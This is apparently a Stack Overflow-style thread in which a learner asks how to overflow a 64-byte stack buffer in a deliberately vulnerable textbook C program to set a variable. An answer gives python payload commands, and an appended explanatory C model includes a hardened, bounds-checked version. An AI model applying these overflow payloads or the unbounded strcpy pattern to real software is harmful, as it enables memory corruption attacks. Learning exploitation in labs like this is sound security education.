Syntactic Fructose

Reputation: 20076

Overflowing the stack into a variable confusion (computer security)

I'm learning computer security through a book I've found online (pretty new to this stuff, go easy!), and one chapter teaches you about overflowing the stack. The function used in the program is:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Provided by the book's harness; the signature here is inferred from the call below. */
void dump_stack(void **esp, int nwords, void **ebp);

void vuln(int tmp, char *str) {
    // attempting to overflow into tmp, setting win accordingly
    int win = tmp;
    // overflowing this array!
    char buf[64];
    strcpy(buf, str);   // unbounded copy: this is the deliberate overflow
    dump_stack((void **) buf, 23, (void **) &tmp);
    printf("win = %d\n", win);
    if (win == 1) {
        printf("You win!\n");
    } else {
        printf("Sorry, you lose.\n");
    }
    exit(0);
}

What I want to do is overflow buf and set the value of tmp to one, setting win accordingly and letting me win.

Currently I'm using a quick Python script to print out 84 'A' characters, up to the point where the stack is filled to the variable I want to set. This is the call I make in the command prompt:

./simple_overwrite $(python -c "print 'A'*84")

The output given is:

Stack dump:
0xffffd614: 0xffffd803 (second argument)
0xffffd610: 0x00000000 (first argument)
0xffffd60c: 0x41414141 (saved eip)
0xffffd608: 0x41414141 (saved ebp)
0xffffd604: 0x41414141
0xffffd600: 0x41414141
0xffffd5fc: 0x41414141
0xffffd5f8: 0x41414141
0xffffd5f4: 0x41414141
0xffffd5f0: 0x41414141
0xffffd5ec: 0x41414141
0xffffd5e8: 0x41414141
0xffffd5e4: 0x41414141
0xffffd5e0: 0x41414141
0xffffd5dc: 0x41414141
0xffffd5d8: 0x41414141
0xffffd5d4: 0x41414141
0xffffd5d0: 0x41414141
0xffffd5cc: 0x41414141
0xffffd5c8: 0x41414141
0xffffd5c4: 0x41414141
0xffffd5c0: 0x41414141
0xffffd5bc: 0x41414141 (beginning of buffer)
win = 1094795585
Sorry, you lose.

Though I'm not quite sure what to enter after the script to set the value to one; I've tried 0x1 and just 1, but neither worked. Any help is really appreciated, thanks!

P.S. I know this is quite a bad practice to learn, but keep in mind this is about computer security; I in no way want to put this into use outside of this tutorial.

Upvotes: 0

Views: 198

Answers (1)

Robᵩ

Reputation: 168596

You've set win to 0x41414141. You want to set it to 1. Try something like this:

./simple_overwrite $(python -c "print 'A'*64 + '\x00\x00\x00\x01'") 

or maybe '\x01\x00\x00\x00', depending on the endianness of your computer.

Upvotes: 2
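To see why the dump above shows win = 0x41414141 (1094795585) and why the byte order in the answer matters, here is an added model in C. It is example code, not from the book's program or the answer: it reproduces the copy inside a struct whose layout (buf directly below win) is an assumption drawn from the stack dump, shows that a C string ends at its first NUL byte so the bytes after it never reach the frame, and ends with a bounds-checked version of vuln(). The function names are assumed as well.

```c
#include <string.h>
#include <stdint.h>

/* Assumed frame layout: buf immediately below win, as the dump suggests. */
struct frame { char buf[64]; int win; };

/* 1 on little-endian hosts (x86, as in the question), 0 on big-endian. */
int is_little_endian(void) {
    uint32_t x = 1;
    unsigned char first;
    memcpy(&first, &x, 1);
    return first == 1;
}

/* 'A' * n_fill followed by tail, like the python one-liners; tail is a C
 * string, so anything after its first NUL byte is silently dropped. */
const char *build_payload(size_t n_fill, const char *tail) {
    static char payload[128];
    if (n_fill + strlen(tail) >= sizeof payload)
        return NULL;
    memset(payload, 'A', n_fill);
    strcpy(payload + n_fill, tail);
    return payload;
}

/* Model of vuln(): win = tmp = 0, then an unbounded copy into buf. strcpy
 * copies through the terminating NUL, so that NUL also lands in the frame.
 * Bytes beyond the modelled frame are ignored; the real program keeps writing. */
int overflow_model(const char *src) {
    struct frame f;
    size_t n = strlen(src) + 1;
    memset(&f, 0, sizeof f);
    if (n > sizeof f)
        n = sizeof f;
    memcpy(&f, src, n);             /* the same bytes strcpy(f.buf, src) writes */
    return f.win;
}

/* Hardened vuln(): check the length first; oversized input is refused. */
int vuln_hardened(int tmp, const char *str) {
    int win = tmp;
    char buf[64];
    size_t n = strlen(str);
    if (n >= sizeof buf)
        return -1;                  /* too long for buf: reject, never overrun */
    memcpy(buf, str, n + 1);
    return win;
}
```

With 84 'A's the model returns 1094795585 exactly as in the dump; with 64 'A's and a single 0x01 byte the little-endian value is 1, while a tail that starts with a NUL byte changes nothing because the copy stops there.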
